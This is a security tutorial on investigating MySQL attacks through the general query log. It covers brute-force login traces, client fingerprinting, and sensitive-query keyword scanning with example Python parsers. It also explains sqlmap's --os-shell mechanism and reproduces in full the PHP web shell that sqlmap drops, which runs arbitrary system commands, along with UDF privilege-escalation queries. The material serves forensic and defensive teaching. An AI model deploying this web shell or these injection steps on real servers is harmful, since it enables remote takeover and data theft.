Common database attacks include weak-password brute forcing, SQL injection, privilege escalation, backup theft, and so on. By analyzing the database logs, you can identify the attacker's actions, reconstruct the attack scenario, and trace the source of the attack.

0x01 MySQL Log Analysis

The General Query Log records successful connections and each query executed, and can be used as part of a security framework for failure analysis or post-hack investigation.

SHOW VARIABLES LIKE '%general%';
SET GLOBAL general_log = 'On';
# SET GLOBAL general_log_file = '/var/lib/mysql.log';

For example, when I visit /test.php?id=1, we get this log:

190604 14:46:14       14 Connect    root@localhost on
                      14 Init DB    test
                      14 Query      SELECT * FROM admin WHERE id = 1
                      14 Quit

Let’s parse it by column:

The first column is Time, the date and time of day. It is not repeated on the following lines because those SQL statements were executed within the same second, so the time is recorded only once. The second column, Id, is the thread id, the same value as the first column of SHOW PROCESSLIST; for long-lived connections and time-consuming SQL statements it tells you exactly which thread ran a statement. The third column, Command, is the operation type: Connect is the connection to the database, and Query is a query operation. The fourth column, Argument, is the operation performed after connecting to the database, for example the SQL text of the query.

0x02 Login Succeeded or Failed

Let's do a simple test using the weak-password scanning tool I developed earlier. The dictionary settings are fairly small: 2 users and 4 passwords, 8 combinations in total.

MySQL log:

Time                 Id Command    Argument
190601 22:03:20      98 Connect    root@192.168.204.1 on
                     98 Connect    Access denied for user 'root'@'192.168.204.1' (using password: YES)
                    103 Connect    mysql@192.168.204.1 on
                    103 Connect    Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
                    104 Connect    mysql@192.168.204.1 on
                    104 Connect    Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
                    100 Connect    <user>@192.168.204.1 on
                    101 Connect    root@192.168.204.1 on
                    101 Connect    Access denied for user 'root'@'192.168.204.1' (using password: YES)
                     99 Connect    root@192.168.204.1 on
                     99 Connect    Access denied for user 'root'@'192.168.204.1' (using password: YES)
                    105 Connect    mysql@192.168.204.1 on
                    105 Connect    Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
                    100 Query      set autocommit=0
                    102 Connect    mysql@192.168.204.1 on
                    102 Connect    Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
                    100 Quit

Can you tell which attempt guessed the password successfully?

With a brute-force tool, a successful password guess looks something like this in the log:

190601 22:03:20     100 Connect    <user>@192.168.204.1 on
                    100 Query      set autocommit=0
                    100 Quit

However, if you log in another way, the record looks a little different.

Navicat for MySQL:

190601 22:14:07     106 Connect    <user>@<host> on
                    106 Query      SET NAMES utf8
                    106 Query      SHOW VARIABLES LIKE 'lower_case_%'
                    106 Query      SHOW VARIABLES LIKE 'profiling'
                    106 Query      SHOW DATABASES

Command line login:

190601 22:17:25     111 Connect    root@localhost on
                    111 Query      select @@version_comment limit 1
190601 22:17:56     111 Quit

The difference is that each database connection tool runs its own connection initialization sequence. Using this difference, we can easily determine how the user connected to the database.

Login failures, by contrast, are recorded the same way whether they come from a brute-force tool, Navicat for MySQL, or the command-line client.

Records of login failures:

102 Connect    mysql@192.168.204.1 on
102 Connect    Access denied for user 'mysql'@'192.168.204.1' (using password: YES)

Simple analysis using shell commands:

# Which IP is brute-forcing?
grep "Access denied" mysql.log | cut -d "'" -f4 | uniq -c | sort -nr
     27 192.168.204.1

# Which user names are in the brute-force dictionary?
grep "Access denied" mysql.log | cut -d "'" -f2 | uniq -c | sort -nr
     13 mysql
     12 root
      1 root
      1 mysql
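The shell one-liners above answer the two counting questions. The following Python script is an added example, not from the original article; it works over the same general-log format and goes a step further: it counts failures per IP and per user, flags threads that connected without an Access denied line from a host that also produced failures (a likely guessed password), and labels the client from the first query it sent, using the initialization sequences shown above as fingerprints. The log lines in it are constructed.

```python
import re
from collections import Counter
# Constructed sample modelled on the excerpts above: a brute-force run from 192.168.204.1
# (two failures, one success), a Navicat login from the same host, and a local CLI login.
SAMPLE_LOG = """\
Time                 Id Command    Argument
190601 22:03:20      98 Connect    root@192.168.204.1 on
                     98 Connect    Access denied for user 'root'@'192.168.204.1' (using password: YES)
                    103 Connect    mysql@192.168.204.1 on
                    103 Connect    Access denied for user 'mysql'@'192.168.204.1' (using password: YES)
                    100 Connect    root@192.168.204.1 on
                    100 Query      set autocommit=0
190601 22:14:07     106 Connect    root@192.168.204.1 on
                    106 Query      SET NAMES utf8
190601 22:17:25     111 Connect    root@localhost on
                    111 Query      select @@version_comment limit 1
"""
LINE_RE = re.compile(r"^(?:\d{6} \d\d:\d\d:\d\d)?\s*(\d+)\s+(Connect|Init DB|Query|Quit)\s*(.*)$")
DENIED_RE = re.compile(r"Access denied for user '([^']*)'@'([^']*)'")
# Client fingerprints assumed from the first query each tool sends after connecting (see above).
CLIENT_SIGNATURES = {
    "set autocommit=0": "brute-force tool",
    "SET NAMES utf8": "Navicat for MySQL",
    "select @@version_comment limit 1": "mysql command-line client",
}

def analyze_logins(log_text):
    """Return (failures per IP, failures per user, successful sessions with a client guess)."""
    failed_by_ip, failed_by_user, sessions = Counter(), Counter(), {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # header line or unrelated output
        tid, cmd, arg = m.groups()
        if cmd == "Connect":
            denied = DENIED_RE.search(arg)
            if denied:                    # second Connect line of a failed handshake
                failed_by_user[denied.group(1)] += 1
                failed_by_ip[denied.group(2)] += 1
                sessions.setdefault(tid, {})["denied"] = True
            else:                         # first Connect line: "user@host on"
                user, _, host = arg.split()[0].partition("@")
                sessions[tid] = {"user": user, "host": host, "denied": False, "first_query": None}
        elif cmd == "Query" and tid in sessions and sessions[tid].get("first_query") is None:
            sessions[tid]["first_query"] = arg.strip()
    successes = [{"id": t, "user": s["user"], "host": s["host"],
                  "client": CLIENT_SIGNATURES.get(s["first_query"], "unknown"),
                  "after_failures": failed_by_ip[s["host"]] > 0}   # success after failures from same host
                 for t, s in sessions.items() if not s.get("denied")]
    return failed_by_ip, failed_by_user, successes
```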

During log analysis you need to pay special attention to sensitive operations, such as dropping tables, dumping databases, and reading and writing files. Keywords: drop table, drop function, lock tables, unlock tables, load_file(), into outfile, into dumpfile.

Sensitive tables to watch:

SELECT * FROM mysql.user;
SELECT * FROM mysql.func;

0x03 SQL Injection Intrusion Trace

When exploiting a SQL injection vulnerability, an attacker will often try sqlmap's --os-shell option to obtain a shell. If this is not cleaned up properly, the temporary tables and custom functions created by sqlmap are left behind. Let's look at how sqlmap's --os-shell works.

Set up a SQL injection test point and have Burp listen on port 8080:

sqlmap.py -u "http://192.168.204.164/sql.php?id=1" --os-shell --proxy=http://127.0.0.1:8080

The HTTP traffic proceeds as follows.

sqlmap creates a temporary file, tmpbwyov.php, executes system commands by requesting this web shell, and displays the output on the page.

tmpbwyov.php:

<?php
$c=$_REQUEST["cmd"];
@set_time_limit(0);
@ignore_user_abort(1);
@ini_set('max_execution_time',0);
$z=@ini_get('disable_functions');
if(!empty($z)){
    $z=preg_replace('/[, ]+/',',',$z);
    $z=explode(',',$z);
    $z=array_map('trim',$z);
}else{
    $z=array();
}
$c=$c." 2>&1\n";
function f($n){
    global $z;
    return is_callable($n)and!in_array($n,$z);
}
if(f('system')){
    ob_start();
    system($c);
    $w=ob_get_contents();
    ob_end_clean();
}elseif(f('proc_open')){
    $y=proc_open($c,array(array(pipe,r),array(pipe,w),array(pipe,w)),$t);
    $w=NULL;
    while(!feof($t[1])){
        $w.=fread($t[1],512);
    }
    @proc_close($y);
}elseif(f('shell_exec')){
    $w=shell_exec($c);
}elseif(f('passthru')){
    ob_start();
    passthru($c);
    $w=ob_get_contents();
    ob_end_clean();
}elseif(f('popen')){
    $x=popen($c,r);
    $w=NULL;
    if(is_resource($x)){
        while(!feof($x)){
            $w.=fread($x,512);
        }
    }
    @pclose($x);
}elseif(f('exec')){
    $w=array();
    exec($c,$w);
    $w=join(chr(10),$w).chr(10);
}else{
    $w=0;
}
print "<pre>".$w."</pre>";
?>

sqlmap creates a temporary table, SQLMAPOutput, calls a stored procedure that executes the system command and writes its output into the temporary table, and then reads the temporary table to display the data on the page.
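As an added example, not part of the original article, the following Python script scans the general log for the sensitive keywords listed in 0x02 together with the sqlmap and UDF residue described here, and attributes each hit to the thread's user@host and timestamp so the sequence of operations can be reconstructed. The sample log lines and the names demo.so and demo_fn are constructed.

```python
import re
# Constructed sample of general-log lines with the kind of residue described above: a sqlmap-style
# temporary table, a file written into the plugin directory, and a UDF loaded from it.
SAMPLE_LOG = """\
190604 15:02:11      21 Connect    root@192.168.204.1 on
                     21 Init DB    test
                     21 Query      SELECT * FROM admin WHERE id = 1
                     21 Query      CREATE TEMPORARY TABLE sqlmapoutput(data VARCHAR(4096))
                     21 Query      SELECT 'demo' INTO DUMPFILE '/var/lib/mysql/lib/plugin/demo.so'
                     21 Query      CREATE FUNCTION demo_fn RETURNS STRING SONAME 'demo.so'
190604 15:03:40      22 Connect    app@localhost on
                     22 Query      SELECT name FROM admin WHERE id = 2
"""
LINE_RE = re.compile(r"^(\d{6} \d\d:\d\d:\d\d)?\s*(\d+)\s+(Connect|Init DB|Query|Quit)\s*(.*)$")
# Keywords from 0x02 plus UDF/sqlmap residue; matched case-insensitively and whitespace-tolerant.
SENSITIVE = {name: re.compile(p, re.I) for name, p in {
    "drop table": r"drop\s+table", "drop function": r"drop\s+function",
    "lock tables": r"(?:un)?lock\s+tables", "load_file": r"load_file\s*\(",
    "into outfile": r"into\s+outfile", "into dumpfile": r"into\s+dumpfile",
    "udf load": r"create\s+function\s+\S+\s+returns\s+\w+\s+soname",
    "sqlmap temp table": r"sqlmapoutput",
}.items()}

def find_sensitive_ops(log_text):
    """Return (time, thread id, user@host, tag, query) for every query matching a sensitive pattern."""
    last_time, who, hits = None, {}, []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, tid, cmd, arg = m.groups()
        last_time = ts or last_time          # lines within the same second omit the timestamp
        if cmd == "Connect" and "Access denied" not in arg:
            who[tid] = arg.split()[0]        # remember user@host per thread for attribution
        elif cmd == "Query":
            for tag, rx in SENSITIVE.items():
                if rx.search(arg):
                    hits.append((last_time, tid, who.get(tid, "?"), tag, arg.strip()))
    return hits
```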

By checking for suspicious newly created files in the website directory, you can determine whether a SQL injection attack has taken place.

Inspection method:

1. Check the website directory for web shell (Trojan) files.

2. Check for traces of UDF and MOF privilege escalation.

Check whether unusual files exist in these directories:

mysql\lib\plugin

c:/windows/system32/wbem/mof/

Check whether the functions have been removed:

select * from mysql.func

3. Correlate with web log analysis.

Well, that wraps up the log analysis series. Next week we will share "Linux In Action"; welcome to follow and like ~